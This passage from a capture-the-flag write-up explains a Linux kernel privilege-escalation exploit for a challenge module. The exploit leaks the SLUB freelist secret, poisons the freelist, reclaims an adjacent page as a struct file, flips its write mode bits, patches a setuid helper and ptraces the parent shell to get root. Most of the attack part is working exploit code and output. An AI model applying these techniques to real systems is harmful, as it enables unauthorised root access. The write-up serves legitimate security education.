uint64_t O24 = e22 ^ e24 ^ 0x4001000000000000ULL; // R and page base both cancel
uint64_t page = O24 - 0xf00;
uint64_t random = e24 ^ bsw(page + 0xf50); // e24 = R ^ bsw(slot24)

// cross-check: decode O_20 -> next must be O_22
if ((e20 ^ random ^ bsw(page + 0xcd0)) != page + 0xdc0)
    die("decode cross-check failed");
Running it:
[~] decode
[+] page_base = 0xffffa30441994000
[+] cache_random = 0x0f2dff77be715bcc
page_base is 0x1000-aligned and lands in the direct map — but note it is not the textbook 0xffff8880...; this kernel has direct-map KASLR, which is exactly why we never hardcode a base and validate with the cross-check (next(O_20) == O_22) instead. With s->random in hand the encoding is fully invertible: we can decode any freelist word, and — more usefully — forge one as target ^ random ^ bswap64(&slot).
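The recovery is easy to verify offline with synthetic words. Below is a self-contained sketch of the same arithmetic wrapped in a function; HeapLeak and recover_leak are names made up for this example, and the page-alignment test is an extra sanity check added here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable 64-bit byte swap. */
static uint64_t bsw(uint64_t v) {
    uint64_t r = 0;
    for (int i = 0; i < 8; i++) {
        r = (r << 8) | (v & 0xff);
        v >>= 8;
    }
    return r;
}

typedef struct {
    uint64_t page;    /* base of the leaked slab page */
    uint64_t random;  /* per-cache freelist secret */
} HeapLeak;

/*
 * Recover page base and secret from the encoded words of O_24, O_22 and
 * O_20, freed in that order on a full pristine page.
 * Returns 0 on success, -1 if a sanity check fails.
 */
static int recover_leak(uint64_t e24, uint64_t e22, uint64_t e20, HeapLeak *out) {
    assert(out != NULL);
    uint64_t o24  = e22 ^ e24 ^ bsw(0xf50 ^ 0xe10);  /* secret and base cancel */
    uint64_t page = o24 - 0xf00;
    if (page & 0xfff)
        return -1;                                   /* base must be page aligned */
    uint64_t random = e24 ^ bsw(page + 0xf50);       /* next(O_24) is NULL */
    if ((e20 ^ random ^ bsw(page + 0xcd0)) != page + 0xdc0)
        return -1;                                   /* next(O_20) must be O_22 */
    out->page = page;
    out->random = random;
    return 0;
}
```

Feeding it words built from a known base and secret returns both unchanged, and corrupting any one word trips a check instead of yielding a bogus base.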
Practical note. The 25-object fill must land on a pristine page for O_i = page + i*0xa0 to hold, so in the exploit decode runs first on a dedicated fd, before any other CREATE, and refills the three freed slots afterwards so the later stages start on a clean page.
Poisoning the freelist
With s->random and a heap base we can run the encoding backwards: to make slot S hold an encoded pointer to target, write target ^ random ^ bswap64(S). The plan is to overwrite a freed object’s +0x50 so the freelist leads to an address we picked — then two CREATEs hand it back as a fresh MultiFile.
Target. page + 0xfc0. A 0xa0 object placed there spans [page+0xfc0, page+0x1060) — the last 0x40 bytes of this page plus the first 0x60 of the next physical page. 0xfc0 sits in the page’s tail padding, and the object’s start is still on a multifiles page, so the membership check and hardened usercopy both stay happy. That straddle is what later becomes a cross-page primitive.
Where we poison. The freed object F has to be the current cpu-slab freelist head and at a known address. page0 from the leak fits both: right after decode it is full and still the cpu slab, and F = page + 12*0xa0 (slot 0x7d0) has a known address. Freeing it pushes it to the cpu freelist with F->next == NULL.
Writing +0x50. Same window as the read, other direction: from the live left neighbor F-1 at f_pos=0x98 the copy lands on F[0x18, 0x58), so we read it, splice the forged word in at leak+0x38, and write it back.
uint32_t F = 12; // F = page + 12*0xa0
uint64_t F_slot = page + 12*0xa0 + 0x50; // page+0x7d0
uint64_t target = page + 0xfc0;

mf_delete(fd, F); // F -> cpu freelist head, F->next == NULL

uint64_t enc = target ^ random ^ bsw(F_slot); // forge
mf_read (fd, F - 1, 0x98, leak, sizeof(leak));
memcpy(leak + 0x38, &enc, 8);
mf_write(fd, F - 1, 0x98, leak, sizeof(leak));

// read it back and decode -> must equal target
mf_read(fd, F - 1, 0x98, leak, sizeof(leak));
memcpy(&enc, leak + 0x38, 8);
uint64_t decoded = enc ^ random ^ bsw(F_slot);

[~] poison
[+] F+0x50 decodes to 0xffff896f419bafc0 (target 0xffff896f419bafc0)
The freelist now reads F -> page+0xfc0: the next CREATE pops F, and the one after pops page+0xfc0. We stop one step short of actually allocating it — popping page+0xfc0 sets the cpu freelist head to whatever garbage sits at *(page+0x1010), so doing it is a one-way door. Instead we re-encode NULL back into F+0x50 and consume F, leaving page0 full and the cache clean. The next step is to make sure that straddle reaches a page we actually own.
Finding contiguous pages
Allocating the fake object isn’t free: CREATE uses kmem_cache_zalloc, which zeroes 0xa0 bytes from page+0xfc0 — and 0x60 of those land in the next physical page. We then read and write that straddle window. So the page at page+0x1000 can’t be arbitrary kernel memory; it has to be a slab page we own, or we corrupt something random and (best case) panic. So before allocating anything at a page tail we first locate a pair of physically adjacent multifiles pages A, B with B == A + 0x1000.
cache_random makes this cheap. The base of any full page falls out of a single NULL-terminated freeptr: free the page’s last object (pos24, at base+0xf00) and its next becomes NULL, so the encoded word is just random ^ bswap64(base+0xf50). Read it through the live pos23 and invert:
// free pos24 -> next == NULL; read its freeptr via the live pos23
mf_delete(fds[last/PERFD], last%PERFD);
mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
memcpy(&enc, leak + 0x38, 8);
uint64_t base = bsw(enc ^ random) - 0xf50; // pos24+0x50 = bsw(enc^random)
Right after decode/poison the cache holds nothing but the full page0, so a plain sequential spray lays down fresh pages page1, page2, … in allocation order — object gi sits at scan_page(gi/25) + (gi%25)*0xa0. We spray SCAN_PAGES of them, decode every base, and look for B == A + 0x1000:
[~] root
[+] A=0xffff9de3419c2000 B=0xffff9de3419c3000
The buddy allocator hands out order-0 pages from contiguous runs often enough that a few dozen are almost always enough to contain an adjacent pair. A is the page whose tail object we’ll poison; B is the page the fake object reaches into.
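Once every sprayed page's base has been decoded, picking the pair is a plain search. A minimal sketch, assuming the bases are collected in an array in spray order; find_adjacent_pair is a hypothetical helper, not taken from the exploit source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Scan decoded page bases for a pair with bases[b] == bases[a] + 0x1000.
 * On success stores the two indices and returns 0; returns -1 if no
 * such pair exists. Quadratic, which is fine for a few dozen pages.
 */
static int find_adjacent_pair(const uint64_t *bases, size_t n,
                              size_t *a, size_t *b) {
    assert(bases != NULL && a != NULL && b != NULL);
    for (size_t i = 0; i < n; i++) {
        for (size_t j = 0; j < n; j++) {
            if (i != j && bases[j] == bases[i] + 0x1000) {
                *a = i;
                *b = j;
                return 0;
            }
        }
    }
    return -1;
}
```

The indices, rather than the addresses, are what the later steps need, since they map back to which fd and slot hold each page's last two objects.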
Allocating the fake object
There’s a snag: A is not the cpu slab. The buddy allocator handed pages out in ascending order, so by the time B exists A is already a deactivated full slab, and a plain CREATE won’t touch it. SLUB’s per-cpu partial list fixes that: freeing A’s tail object turns A partial, and once the current cpu slab runs dry the allocator pulls A back and starts handing out its objects again. So we free pos24, forge its next to A+0xfc0, and CREATE twice — the first pops pos24, the second pops A+0xfc0:
mf_delete(fds[last/PERFD], last%PERFD); // free A's tail
uint64_t enc = (A + 0xfc0) ^ random ^ bsw(A + 0xf50); // forge pos24->next
mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
memcpy(leak + 0x38, &enc, 8);
mf_write(fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));

mf_create(fds[last/PERFD], "reB"); // pops pos24
int fake = mf_create(fake_store, "pad"); // pops A+0xfc0 -> the fake object
fake is a perfectly legal MultiFile whose body runs off the end of A. Its data starts at A+0xfe0, so data[4] is A+0x1000 = B+0, the first object on the next page. There is one rule for using it: the copy has to start on A, or the membership check trips. f_pos=0x1f puts the base at A+0xfff (the last byte of A), so a 0x40-byte copy takes one byte from A and the remaining 0x3f bytes from B. Every B field therefore comes back at buf[1 + offset], a one-byte shift we just carry around.
That’s the primitive: a controlled read/write into the physical page right after A. Now we make that page hold something worth corrupting.
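The one-byte shift is worth wrapping once so it cannot be forgotten. A small sketch with hypothetical helpers straddle_index and straddle_load32; the constants are the ones quoted in the text, and memcpy is used because the fields end up unaligned in the buffer.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define FAKE_OFF 0xfc0  /* fake object's offset on page A */
#define DATA_OFF 0x20   /* offsetof(MultiFile, data) */
#define F_POS    0x1f   /* copy base = A + 0xfff */
#define WINDOW   0x40   /* MAX_RW_SIZE */

/* Index in the copy buffer of the byte at B + b_off. */
static size_t straddle_index(size_t b_off) {
    size_t base = FAKE_OFF + DATA_OFF + F_POS;  /* 0xfff, still on A */
    assert(base < 0x1000);
    return 0x1000 + b_off - base;               /* 1 + b_off */
}

/* Unaligned-safe load of a 32-bit field at B + b_off from the buffer. */
static uint32_t straddle_load32(const uint8_t buf[WINDOW], size_t b_off) {
    size_t i = straddle_index(b_off);
    assert(i + sizeof(uint32_t) <= WINDOW);
    uint32_t v;
    memcpy(&v, buf + i, sizeof(v));
    return v;
}
```

With this window only B offsets 0x00 through 0x3e are visible, which is enough for fields near the start of whatever object ends up at B+0.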
Reclaiming B as a struct file
B is full of our MultiFiles. To hand its page to another cache we drain it back to the buddy allocator and lean on SLUB’s discard policy. With CONFIG_SLUB_CPU_PARTIAL the per-cpu partial list holds ~10 slabs and the node keeps min_partial = 5 empties; past that, freeing an empty slab discards its page to buddy. So we turn a batch of full pages into empties — 11 to warm the cpu-partial chain, then B plus 9 more to push the discard through:
for (i = 0; i < WARMUP_EMPTY_PAGES; i++) free_full_page(fds, press[i]); // 11
free_full_page(fds, bp); // B
for (i = 0; i < TARGET_EMPTY_PAGES - 1; i++) free_full_page(fds, press[11+i]); // 9
Then we poison A’s tail and realize the fake object exactly as before — only now its body straddles into B’s freed physical page. Spraying open("/bin/drop_priv", O_RDONLY|O_NONBLOCK) makes filp_cachep reclaim that page; the first struct file lands at B+0, right under the fake object. After each open we read the straddle window (f_pos=0x1f, so B+x is at buf[1+x]) and test for the file: f_mode is READ|CAN_READ with no WRITE, f_op/f_mapping/f_inode look like kernel pointers, private_data == 0, and f_flags == O_NONBLOCK|O_LARGEFILE.
[+] B reclaimed as /bin/drop_priv struct file after 188 opens
    f_mode=0x004a801d f_flags=0x00008800 f_op=0xffffffff95c1acc0
From f_mode to a root shell
vfs_write() gates on the write bits in file->f_mode, and we have a write primitive into that exact struct file, so we OR them in through the straddle window:
mode |= FMODE_WRITE | FMODE_PWRITE | FMODE_CAN_WRITE; // at buf[1 + 0x0c]
mf_write(fake_store, fake, 0x1f, buf, 0x40);
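The buffer edit itself can be sketched as follows. The FMODE_* values are what I believe include/linux/fs.h defines for this kernel series, so treat them as assumptions to verify against the target's headers; flip_write_bits is a hypothetical helper and only touches the local buffer, the write-back still goes through mf_write.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed values, to be checked against the target kernel's fs.h. */
#define FMODE_WRITE     0x2u
#define FMODE_PWRITE    0x10u
#define FMODE_CAN_WRITE 0x40000u

#define F_MODE_IDX (1 + 0x0c)  /* one-byte straddle shift + f_mode offset */

/* OR the write bits into f_mode inside the 0x40-byte straddle buffer. */
static uint32_t flip_write_bits(uint8_t buf[0x40]) {
    assert(buf != NULL);
    uint32_t mode;
    memcpy(&mode, buf + F_MODE_IDX, sizeof(mode));   /* unaligned-safe load */
    mode |= FMODE_WRITE | FMODE_PWRITE | FMODE_CAN_WRITE;
    memcpy(buf + F_MODE_IDX, &mode, sizeof(mode));   /* store it back */
    return mode;
}
```

Starting from the f_mode=0x004a801d seen in the log, the result is 0x004e801f. Everything else in the buffer is written back unchanged, which matters because the same 0x40 bytes also cover the file's refcount and lock.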
The read-only fd we opened is now writable. /bin/drop_priv just setuid(1000)s and execs a shell, so we only need its two 1000 immediates to become 0. We find them by scanning the binary for the mov edi, 1000 ; call pattern (offsets 0x1514, 0x152f here) and pwrite zeros over them:
patch_drop_priv_fd(target_fd, poff, npoff); // pwrite 0x00000000 over each 0x000003e8
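The scan for the two immediates can be sketched like this. It assumes the compiler emitted the 5-byte form of mov edi, 1000 (BF E8 03 00 00) directly followed by a near call (E8); find_uid_immediates is a hypothetical name and not the exploit's own scanner.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Find "mov edi, 1000" immediately followed by "call rel32". Stores the
 * offset of each 32-bit immediate (the byte after the BF opcode) in out[]
 * and returns how many were found, at most max_out.
 */
static size_t find_uid_immediates(const uint8_t *img, size_t len,
                                  size_t *out, size_t max_out) {
    static const uint8_t pat[] = { 0xbf, 0xe8, 0x03, 0x00, 0x00, 0xe8 };
    size_t found = 0;
    assert(img != NULL && out != NULL);
    for (size_t i = 0; i + sizeof(pat) <= len && found < max_out; i++) {
        if (memcmp(img + i, pat, sizeof(pat)) == 0)
            out[found++] = i + 1;  /* skip the opcode byte */
    }
    return found;
}
```

Each returned offset points at the four bytes E8 03 00 00, so overwriting them with zeros turns the argument into uid 0 without changing the instruction length.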
Then the handoff. The initrd’s init is an infinite while true; do /bin/drop_priv; done, so we just need the current (uid 1000) shell to exit and the loop re-runs the patched binary. We ptrace the parent shell and rewrite its registers to exit_group(0), pointing rip at a syscall; ret in its vDSO:
make_parent_exit_zero(); // ATTACH parent; rax=__NR_exit_group, rdi=0, rip=vdso syscall;ret
This needs no privileges, which surprised me at first. At this point we’re still uid 1000 and so is the parent shell, and same-uid ptrace is unprivileged — you only need CAP_SYS_PTRACE to attach across a privilege boundary. On top of that this kernel ships without Yama (CONFIG_SECURITY_YAMA is unset), so there’s no ptrace_scope to forbid attaching to an ancestor. If it ever did fail, poking exit into the tty with TIOCSTI or just killing the shell would do the same job.
No kernel payload, no commit_creds, no KASLR-dependent symbol — just a patched suid-like helper. init respawns the shell through the patched drop_priv, and it comes up root:
[~] root
[+] A=0xffff9de3419c2000 B=0xffff9de3419c3000
[+] drop_priv patch offsets: 0x1514 0x152f
[+] B reclaimed as /bin/drop_priv struct file after 188 opens
[+] flipped FMODE_WRITE on the read-only struct file
    patch[0] off=0x1514 old=0x000003e8
    patch[1] off=0x152f old=0x000003e8
[+] patched /bin/drop_priv
[+] forced parent shell exit(0) -> init respawns a root shell
/home/ctf # id
uid=0(root) gid=0(root) groups=0(root)
That’s the whole chain: a base-vs-bounds OOB inside one hardened SLUB cache, turned into a heap leak, a freelist forge, a page-straddling fake object, a cross-cache reclaim, and finally a userland binary patch — bctf{:3} never needed.
Full source code can be found here.
Conclusion
That wraps up both kernel challenges from b01lers 2026. Multifiles was my favorite of the two. Hope it was a useful read.
References
- Part 1: throughthewall (the firewall UAF, and the same /bin/drop_priv patch finale from a different write primitive)
- KSPP study: protecting heap metadata (how SLAB_FREELIST_HARDENED works)
- duasynt: Linux kernel heap feng shui in 2022
- sam4k: exploring Linux's random kmalloc caches
- Dirty Pagetable
- r1ru: Linux kernel exploitation series